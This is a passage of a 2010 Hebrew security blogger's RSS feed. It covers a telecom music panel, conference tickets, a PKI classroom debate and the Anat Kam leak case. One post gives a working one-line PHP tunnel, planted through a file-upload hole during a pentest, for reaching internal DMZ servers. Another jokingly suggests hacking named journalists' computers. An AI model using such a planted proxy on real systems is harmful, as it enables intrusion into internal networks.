<p>יאיר שואל אם מישהו שאין לו רונית ארבל עדיין יכול להיות ראשון? גיא   מפלאפון עונה שיש להם כמה שערים (כשאיילה צורך מקשה שיש רק שער אחד, הוא   עדיין עונה שיש כמה שערים). גיא אומר שהם מנסים להעניק ללקוח חוויה טובה   ולכן משנים את הדברים שחושבים שיקלעו לדעת הקהל.</p>
<p>איילה: למה אין חנות  מוסיקה דיגיטלית של כל החברות יחד? יאיר עונה  שהחברות לא מצליחות להגיע  להסכם (הוא אומר: זה כמו שלום עם הערבים). ישנה  השוואה לאייטיונז ואפל.</p>
<p>יוני  &#8211; ישראל מיוחדת בעניין הזה. היא מאוד מתקדמת וגם מאוד מיושנת. טל &#8211;  העניין  הוא הפתרון המלא שאפל נותנת ומחמיא לחברות הסלולר שהן עושות את זה  טוב.</p>
<p>יוני  מעלה נקודה חשובה &#8211; אין יותר ערך לסאונד טוב בשל העניין שבטלפון  שומעים  פשוט גרוע.</p>
<p>הפאנל היה מעניין ממאוד והוא מראה כמה יש אנשים  שמחוברים וכמה כאלה שלא.</p>
<p>לסיום קליפ של יוני בלוך &#8211; קליפ  אינטראקטיבי ומגניב לחלוטין <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2591%25d7%259b%25d7%25a0%25d7%25a1-%25d7%2593%25d7%2594%25d7%259e%25d7%25a8%25d7%25a7%25d7%25a8&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%91%D7%9B%D7%A0%D7%A1+%D7%93%D7%94%D7%9E%D7%A8%D7%A7%D7%A8+http://bit.ly/9RXq3Q" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%91%d7%9b%d7%a0%d7%a1-%d7%93%d7%94%d7%9e%d7%a8%d7%a7%d7%a8/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>&#8235;10 כרטיסים לכנס של דה מרקר &#8211; מי רוצה?&#8236;</title>		<link>http://guym.co.il/10-%d7%9b%d7%a8%d7%98%d7%99%d7%a1%d7%99%d7%9d-%d7%9c%d7%9b%d7%a0%d7%a1-%d7%a9%d7%9c-%d7%93%d7%94-%d7%9e%d7%a8%d7%a7%d7%a8-%d7%9e%d7%99-%d7%a8%d7%95%d7%a6%d7%94/?nucrss=1</link>
		<comments>http://guym.co.il/10-%d7%9b%d7%a8%d7%98%d7%99%d7%a1%d7%99%d7%9d-%d7%9c%d7%9b%d7%a0%d7%a1-%d7%a9%d7%9c-%d7%93%d7%94-%d7%9e%d7%a8%d7%a7%d7%a8-%d7%9e%d7%99-%d7%a8%d7%95%d7%a6%d7%94/#comments</comments>
		<pubDate>Thu, 29 Apr 2010 05:39:13 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1385</guid>
		<description><![CDATA[&#8235;דה מרקר שיחקו אותה והחליטו לתת לבלוגרים נבחרים (ואני בינהם) 10 כרטיסים לכנס COM.Vention.
פרטים על הכנס פה: http://comvention.themarker.com.
מישהו רוצה להגיע?
עריכה &#8211; מצטער, אין כרטיסים. מי שקיבל מייל &#8211; יש לכם.
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F10-%25d7%259b%25d7%25a8%25d7%2598%25d7%2599%25d7%25a1%25d7%2599%25d7%259d-%25d7%259c%25d7%259b%25d7%25a0%25d7%25a1-%25d7%25a9%25d7%259c-%25d7%2593%25d7%2594-%25d7%259e%25d7%25a8%25d7%25a7%25d7%25a8-%25d7%259e%25d7%2599-%25d7%25a8%25d7%2595%25d7%25a6%25d7%2594&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>דה מרקר שיחקו אותה והחליטו לתת לבלוגרים נבחרים (ואני בינהם) 10 כרטיסים לכנס <a href="http://comvention.themarker.com" target="_blank">COM.Vention.</a></p>
<p>פרטים על הכנס פה: <a href="http://comvention.themarker.com" target="_blank">http://comvention.themarker.com</a>.</p>
<p>מישהו רוצה להגיע?</p>
<p>עריכה &#8211; מצטער, אין כרטיסים. מי שקיבל מייל &#8211; יש לכם.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F10-%25d7%259b%25d7%25a8%25d7%2598%25d7%2599%25d7%25a1%25d7%2599%25d7%259d-%25d7%259c%25d7%259b%25d7%25a0%25d7%25a1-%25d7%25a9%25d7%259c-%25d7%2593%25d7%2594-%25d7%259e%25d7%25a8%25d7%25a7%25d7%25a8-%25d7%259e%25d7%2599-%25d7%25a8%25d7%2595%25d7%25a6%25d7%2594&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=10+%D7%9B%D7%A8%D7%98%D7%99%D7%A1%D7%99%D7%9D+%D7%9C%D7%9B%D7%A0%D7%A1+%D7%A9%D7%9C+%D7%93%D7%94+%D7%9E%D7%A8%D7%A7%D7%A8+%E2%80%93+%D7%9E%D7%99+%D7%A8%D7%95%D7%A6%D7%94%3F+http://bit.ly/cgskh2" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/10-%d7%9b%d7%a8%d7%98%d7%99%d7%a1%d7%99%d7%9d-%d7%9c%d7%9b%d7%a0%d7%a1-%d7%a9%d7%9c-%d7%93%d7%94-%d7%9e%d7%a8%d7%a7%d7%a8-%d7%9e%d7%99-%d7%a8%d7%95%d7%a6%d7%94/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>&#8235;כנס http://comvention.themarker.com&#8236;</title>		<link>http://guym.co.il/%d7%9b%d7%a0%d7%a1-httpcomvention-themarker-com/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%9b%d7%a0%d7%a1-httpcomvention-themarker-com/#comments</comments>
		<pubDate>Sat, 24 Apr 2010 15:20:51 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1374</guid>
		<description><![CDATA[&#8235;מישהו יכול לארגן לי הזמנה לכנס COM.Vention של דהמרקר?
פרטים על הכנס פה: http://comvention.themarker.com...
נראה מעניין ולא בא לי להוציא 450 ש&#34;ח..
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259b%25d7%25a0%25d7%25a1-httpcomvention-themarker-com&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>מישהו יכול לארגן לי הזמנה לכנס COM.Vention של דהמרקר?</p>
<p>פרטים על הכנס פה: <a href="http://comvention.themarker.com" target="_blank">http://comvention.themarker.com..</a>.<br />
נראה מעניין ולא בא לי להוציא 450 ש&quot;ח..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259b%25d7%25a0%25d7%25a1-httpcomvention-themarker-com&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9B%D7%A0%D7%A1+http%3A%2F%2Fcomvention.themarker.com+http://bit.ly/dCLwRa" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%9b%d7%a0%d7%a1-httpcomvention-themarker-com/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>&#8235;simple tunnel using php&#8236;</title>		<link>http://guym.co.il/simple-tunnel-using-php/?nucrss=1</link>
		<comments>http://guym.co.il/simple-tunnel-using-php/#comments</comments>
		<pubDate>Tue, 20 Apr 2010 14:52:28 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[ssh]]></category>
		<category><![CDATA[tunnel]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1344</guid>
		<description><![CDATA[&#8235;במהלך PENTEST שביצעתי נתקלתי בשרת לינוקס עם אפאצ'י שמצד אחד מחובר לאינטרנט ומהצד השני מחובר ל-DMZ ברשת הארגונית.
אני רציתי להגיע ל-HTTP לשרת אחר בתוך ה-DMZ.
לאחר שמצאתי על האפאצ'י אתר עם חור חביב שאפשר לי לייצר קובץ, עשיתי את הדבר הזה בקובץ שקראתי לו tunnel.php (שם לא מאוד תמים   ):
&#60;?php
echo stripslashes(file_get_contents($_GET["url"]));
?&#62;
כל מה שנשאר עכשיו [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fsimple-tunnel-using-php&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>במהלך PENTEST שביצעתי נתקלתי בשרת לינוקס עם אפאצ'י שמצד אחד מחובר לאינטרנט ומהצד השני מחובר ל-DMZ ברשת הארגונית.</p>
<p>אני רציתי להגיע ל-HTTP לשרת אחר בתוך ה-DMZ.</p>
<p>לאחר שמצאתי על האפאצ'י אתר עם חור חביב שאפשר לי לייצר קובץ, עשיתי את הדבר הזה בקובץ שקראתי לו tunnel.php (שם לא מאוד תמים <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  ):</p>
<p dir="ltr">&lt;?php<br />
echo stripslashes(file_get_contents($_GET["url"]));<br />
?&gt;</p>
<p style="text-align: right;" dir="rtl">כל מה שנשאר עכשיו זה לפנות אל השרת השכן ב-DMZ בצורה הזו:</p>
<p style="text-align: right;" dir="rtl">http://outside-ip-addr/tunnel.php?url=http://inside-dmz-ip</p>
<p style="text-align: right;" dir="rtl">לא מושלם, אבל עובד <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fsimple-tunnel-using-php&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=simple+tunnel+using+php+http://bit.ly/bd8zVm" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/simple-tunnel-using-php/feed/</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
		<item>
		<title>&#8235;איך PKI ותעודות דיגיטליות גורמים לי לרדת על מיקרוסופט (בטעות)?&#8236;</title>		<link>http://guym.co.il/%d7%90%d7%99%d7%9a-pki-%d7%95%d7%aa%d7%a2%d7%95%d7%93%d7%95%d7%aa-%d7%93%d7%99%d7%92%d7%99%d7%98%d7%9c%d7%99%d7%95%d7%aa-%d7%92%d7%95%d7%a8%d7%9e%d7%99%d7%9d-%d7%9c%d7%99-%d7%9c%d7%a8%d7%93%d7%aa/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%90%d7%99%d7%9a-pki-%d7%95%d7%aa%d7%a2%d7%95%d7%93%d7%95%d7%aa-%d7%93%d7%99%d7%92%d7%99%d7%98%d7%9c%d7%99%d7%95%d7%aa-%d7%92%d7%95%d7%a8%d7%9e%d7%99%d7%9d-%d7%9c%d7%99-%d7%9c%d7%a8%d7%93%d7%aa/#comments</comments>
		<pubDate>Wed, 14 Apr 2010 13:36:53 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1336</guid>
		<description><![CDATA[&#8235;ביום שני האחרון הייתי בשיעור (חלק מקורס CISO בטכניון) בו הוסבר על נושאים כגון Certificate Authority, Digital Certificates וכן PKI.
אני לא ארחיב בעניין ולא אכנס לנושאים האלה ואיך הם עובדים כרגע (אולי בעתיד הקרוב אם יהיה לי זמן), אבל משהו מאוד צרם לי.
אנשים הלומדים בקורס (חלקם לפחות) משולבים בתעשיית ה-IT. חלקם מנהלי אבטחה, חלקם טכנאי [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2590%25d7%2599%25d7%259a-pki-%25d7%2595%25d7%25aa%25d7%25a2%25d7%2595%25d7%2593%25d7%2595%25d7%25aa-%25d7%2593%25d7%2599%25d7%2592%25d7%2599%25d7%2598%25d7%259c%25d7%2599%25d7%2595%25d7%25aa-%25d7%2592%25d7%2595%25d7%25a8%25d7%259e%25d7%2599%25d7%259d-%25d7%259c%25d7%2599-%25d7%259c%25d7%25a8%25d7%2593%25d7%25aa&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>ביום שני האחרון הייתי בשיעור (חלק מקורס CISO בטכניון) בו הוסבר על נושאים כגון Certificate Authority, Digital Certificates וכן PKI.</p>
<p>אני לא ארחיב בעניין ולא אכנס לנושאים האלה ואיך הם עובדים כרגע (אולי בעתיד הקרוב אם יהיה לי זמן), אבל משהו מאוד צרם לי.</p>
<p>אנשים הלומדים בקורס (חלקם לפחות) משולבים בתעשיית ה-IT. חלקם מנהלי אבטחה, חלקם טכנאי אבטחה, חלקם אנשי רשתות.</p>
<p>היה מובן שחלק מהאנשים מכירים את המוצרים הקיימים בשוק.</p>
<p>באחת האמירות של המרצה התעוררה סערה גדולה.</p>
<p>הסטודנטים התווכחו שה-CA חייב לייצר את ה-Public Key וכן את ה-Private Key שניתנים למחשב שעליו אנו רוצים לייצר אפשרות הצפנה.</p>
<p>מדוע?</p>
<p>כיוון שבתוך ארגון בו מוטמע פתרון מייקרוסופטי יש אפשרות ל-ADMINISTRATOR לגשת אל ה-CA ולפתוח הצפנות של משתמשים. (אותם ראשי תיבות, אותו מובן, לא אותה כוונה. זהו CA ארגוני ולא CA חיצוני  לארגון כגון THAWTE, VERISIGN וכ&quot;ו)</p>
<p>הצורך ברור: משתמש עזב את הארגון וכעת צריכים גישה אל החומר שלו. משתמש הצפין בזדון קבצים כדי להפריע לעבודה של הארגון וכ&quot;ו.</p>
<p>אך האם כך קורה גם בעולם האמיתי?</p>
<p>זה ברור שלא.</p>
<p>תהליך ייצור המפתחות מתבצע אצל הקליינט (נניח, בנק X). הוא פונה אל ה-CA עם המפתח הציבורי. ל-CA אין את המפתח הפרטי של הבנק.</p>
<p>אז למה היה ויכוח?</p>
<p>כי זה שונה ממה שמתבצע בתוך ארגון עם CA פנימי כמו שהחבר'ה הכירו.</p>
<p>הויכוח קצת הצחיק אותי ונפלט לי: &quot;מיקרוסופט עיוותו אותכם&quot;.</p>
<p>הכוונה היתה שההיכרות עם מוצר מסויים והיכולות שלו גרמו להם לא להבין איך הדברים עובדים מחוץ לארגון.</p>
<p>אני חייב התנצלות למיקרוסופט, מקווה שהיא סולחת לי <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%2590%25d7%2599%25d7%259a-pki-%25d7%2595%25d7%25aa%25d7%25a2%25d7%2595%25d7%2593%25d7%2595%25d7%25aa-%25d7%2593%25d7%2599%25d7%2592%25d7%2599%25d7%2598%25d7%259c%25d7%2599%25d7%2595%25d7%25aa-%25d7%2592%25d7%2595%25d7%25a8%25d7%259e%25d7%2599%25d7%259d-%25d7%259c%25d7%2599-%25d7%259c%25d7%25a8%25d7%2593%25d7%25aa&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%99%D7%9A+PKI+%D7%95%D7%AA%D7%A2%D7%95%D7%93%D7%95%D7%AA+%D7%93%D7%99%D7%92%D7%99%D7%98%D7%9C%D7%99%D7%95%D7%AA+%D7%92%D7%95%D7%A8%D7%9E%D7%99%D7%9D+%D7%9C%D7%99+%D7%9C%D7%A8%D7%93%D7%AA+%D7%A2%D7%9C+%D7%9E%D7%99%D7%A7%D7%A8%D7%95%D7%A1%D7%95%D7%A4%D7%98+%28%D7%91%D7%98%D7%A2%D7%95%D7%AA%29%3F+http://bit.ly/cQghm5" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%90%d7%99%d7%9a-pki-%d7%95%d7%aa%d7%a2%d7%95%d7%93%d7%95%d7%aa-%d7%93%d7%99%d7%92%d7%99%d7%98%d7%9c%d7%99%d7%95%d7%aa-%d7%92%d7%95%d7%a8%d7%9e%d7%99%d7%9d-%d7%9c%d7%99-%d7%9c%d7%a8%d7%93%d7%aa/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>&#8235;למה חשוב שמסמכים סודיים לא יגיעו לידיים של עיתונאים&#8236;</title>		<link>http://guym.co.il/%d7%9c%d7%9e%d7%94-%d7%97%d7%a9%d7%95%d7%91-%d7%a9%d7%9e%d7%a1%d7%9e%d7%9b%d7%99%d7%9d-%d7%a1%d7%95%d7%93%d7%99%d7%99%d7%9d-%d7%9c%d7%90-%d7%99%d7%92%d7%99%d7%a2%d7%95-%d7%9c%d7%99%d7%93%d7%99%d7%99/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%9c%d7%9e%d7%94-%d7%97%d7%a9%d7%95%d7%91-%d7%a9%d7%9e%d7%a1%d7%9e%d7%9b%d7%99%d7%9d-%d7%a1%d7%95%d7%93%d7%99%d7%99%d7%9d-%d7%9c%d7%90-%d7%99%d7%92%d7%99%d7%a2%d7%95-%d7%9c%d7%99%d7%93%d7%99%d7%99/#comments</comments>
		<pubDate>Wed, 14 Apr 2010 13:08:25 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[סודי]]></category>
		<category><![CDATA[ענת קם]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1330</guid>
		<description><![CDATA[&#8235;קראתי היום בבלוג של רביב דרוקר משהו מעניין:
כמה ציטוטים:
&#34;לא, לא הייתי אומר לענת קם &#34;לא,  תודה&#34;, אם היא הייתה מציעה לי את הדיסק און קי עם 2000 המסמכים. מצטער,  תקראו לי עוכר ישראל, אבל  גם לא הייתי מחזיר מיידית את המסמכים לצבא  ולשב&#34;כ. למה לא? אני לא בטוח שאני יודע עד הסוף [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259c%25d7%259e%25d7%2594-%25d7%2597%25d7%25a9%25d7%2595%25d7%2591-%25d7%25a9%25d7%259e%25d7%25a1%25d7%259e%25d7%259b%25d7%2599%25d7%259d-%25d7%25a1%25d7%2595%25d7%2593%25d7%2599%25d7%2599%25d7%259d-%25d7%259c%25d7%2590-%25d7%2599%25d7%2592%25d7%2599%25d7%25a2%25d7%2595-%25d7%259c%25d7%2599%25d7%2593%25d7%2599%25d7%2599&crtId=148&dt=1283503588">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>קראתי היום בבלוג של רביב דרוקר משהו מעניין:</p>
<p>כמה ציטוטים:</p>
<p>&quot;לא, לא הייתי אומר לענת קם &quot;לא,  תודה&quot;, אם היא הייתה מציעה לי את הדיסק און קי עם 2000 המסמכים. מצטער,  תקראו לי עוכר ישראל, אבל  גם לא הייתי מחזיר מיידית את המסמכים לצבא  ולשב&quot;כ. למה לא? אני לא בטוח שאני יודע עד הסוף אינטלקטואלית. זה משהו בדנא  העיתונאי. אני לא מרגיש שאם התוכנית המבצעית נמצאת בידיים שלי, היא בידיים  לא בטוחות.&quot;</p>
<p>&quot;ברור שהסוג הזה של מסמכים לא צריך  להסתובב אצל עיתונאים, אבל היו לי כבר כמה מסמכים סודיים בידיים (לא  מבצעיים ולא ברמה הזו) והם נשארו רק בידיים שלי.&quot;</p>
<p>&quot;אני בטוח שגם עורכי &quot;הארץ&quot; ואורי  בלאו מבינים שהם לא היו צריכים להדפיס את שלושת המסמכים, שזה חשף את קם  לסיכון מוגזם.&quot;</p>
<p>&quot;עובדה שימים ספורים אחרי הפרסום  כבר ידע יונתן דחוח הלוי לקבוע במאמר שהדליפה יצאה מלשכת אלוף פיקוד המרכז.  רק ללשכה הזו מצטלבים שלושת המסמכים שפורסמו, הוא הסביר.מצד שני, עובדה  שלמרות פרסום המסמכים לקח לשב&quot;כ 13 חודשים להגיע לענת קם.&quot;</p>
<p>אסיים לצטט פה ואמליץ לכם לקרוא את הפוסט הזה:</p>
<p><a href="http://israblog.nana10.co.il/tblogread.asp?blog=394281&amp;blogcode=11706874" target="_blank">http://israblog.nana10.co.il/tblogread.asp?blog=394281&amp;blogcode=11706874</a></p>
<p>מה יש לי להגיד על זה?</p>
<p>1. יש לי לחדש למר דרוקר. אם המסמכים נמצאים על דיסק און קי אצלו הם לחלוטין לא בטוחים. אני מוכן להמר הימור מחושב שהמחשב שהוא עובד עליו מחור לרשת האינטרנט.</p>
<p>אני בטוח שדרוקר גולש באינטרנט, מקבל מיילים, פותח מסמכים ששולחים לו וכ&quot;ו.</p>
<p>בתנאים כאלה אין שום סיכוי שהוא היה יכול לשמור על המחשב שלו סטרילי ולא לאפשר גישה לאותם 2000 מסמכים.</p>
<p>2. ראה 1. אני בטוח שהם לא נשארו בידיים שלך. יש אותם לעוד גורמים כאלה ואחרים.</p>
<p>3. אין לי שום רחמים על ענת קם עצמה. היא עברה עבירה וצריכה לשבת בכלא. מה שכן יש לי להגיד (ורק אתמול מישהו שאני מאוד מעריך את דעתו אמר לי את אותם דברים) זה שההדלפות האלה של מסמכים מסווגים לא הומצאו ע&quot;י ענת קם.</p>
<p>לצערי, יש יותר מדי אנשים שמדליפים מידע מהצבא לעיתונאים. הם עושים את זה כדי לקבל אח&quot;כ כתבות טובות כשיגיעו לפוליטיקה או בשביל כל סיבה הזוייה אחרת.</p>
<p>הצבא לא מתייחס לעובדה הזאת בצורה מספקת וגם כאן חייבים להגיד שהדג מסריח מראשו.</p>
<p>הצבא נמצא במדינה ששרים בממשלה שלה מדליפים גם הם אמירות סודיות שנאמרות בדלתיים סגורות אז אם מותר לחמור הגדול, כנראה שיסלחו על כך גם לחמורים הקטנים.</p>
<p>4. אני חושב שאם לקח לשב&quot;כ 13 חודשים למצוא מה שיונתן דחוח הלוי לקבוע בקלות, יש כאן מחדל. אני אדגיש שאני לא מאמין שזה מה שקרה (13 חודשים כשמישהו אחר עשה את זה תוך ימים בודדים? נו באמת. אני חייב לתת לחבר'ה שם קרדיט שהם לא פחות חדורי מוטיבציה מאותו יונתן.).</p>
<p>עוד דבר אחד שצריך להוסיף כ&quot;טיפ&quot; לאויבי ועוכרי מדינת ישראל?</p>
<p>תפרצו לכתבים הבטחוניים למחשב. כנראה שיהיה שם הרבה חומר מעניין שלפחות חלקו מסווג.</p>
<p>ככל שהכתב יותר מעניין &#8211; יהיה שם יותר חומר מסווג.</p>
<p>הייתי מתחיל עם רונן ברגמן. החשיפות שהוא עושה מדהימות והספרים שלו מאוד מאוד מעניינים. (למי שעדיין לא קרא &#8211; נקודת העל חזור הוא ספר שחייבים לקרוא. לרונן ברגמן עצמו &#8211; מצטער שאני חושף את המחשב שלך ככה. אם אתה צריך עזרה &#8211; יש לך את הפרטים שלי <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  לקהל הקוראים &#8211; שיהיה ברור שאני לא ממליץ לכם לפרוץ לאף מחשב! זה רק לאויבי מדינת ישראל ).</p>
<p>עריכה:</p>
<p>שכחתי להמליץ על עוד ספר של רונן ברגמן &#8211; &quot;מדינת ישראל תעשה הכל&quot;. ספר מאלף אף הוא ותוסיפו לרשימת ה&quot;חייבים לקרוא&quot;.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%259c%25d7%259e%25d7%2594-%25d7%2597%25d7%25a9%25d7%2595%25d7%2591-%25d7%25a9%25d7%259e%25d7%25a1%25d7%259e%25d7%259b%25d7%2599%25d7%259d-%25d7%25a1%25d7%2595%25d7%2593%25d7%2599%25d7%2599%25d7%259d-%25d7%259c%25d7%2590-%25d7%2599%25d7%2592%25d7%2599%25d7%25a2%25d7%2595-%25d7%259c%25d7%2599%25d7%2593%25d7%2599%25d7%2599&crtId=148&dt=1283503588"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%9C%D7%9E%D7%94+%D7%97%D7%A9%D7%95%D7%91+%D7%A9%D7%9E%D7%A1%D7%9E%D7%9B%D7%99%D7%9D+%D7%A1%D7%95%D7%93%D7%99%D7%99%D7%9D+%D7%9C%D7%90+%D7%99%D7%92%D7%99%D7%A2%D7%95+%D7%9C%D7%99%D7%93%D7%99%D7%99%D7%9D+%D7%A9%D7%9C+%D7%A2%D7%99%D7%AA%D7%95%D7%A0%D7%90%D7%99%D7%9D+http://bit.ly/9Zdiq7" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%9c%d7%9e%d7%94-%d7%97%d7%a9%d7%95%d7%91-%d7%a9%d7%9e%d7%a1%d7%9e%d7%9b%d7%99%d7%9d-%d7%a1%d7%95%d7%93%d7%99%d7%99%d7%9d-%d7%9c%d7%90-%d7%99%d7%92%d7%99%d7%a2%d7%95-%d7%9c%d7%99%d7%93%d7%99%d7%99/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
	</channel>
</rss>
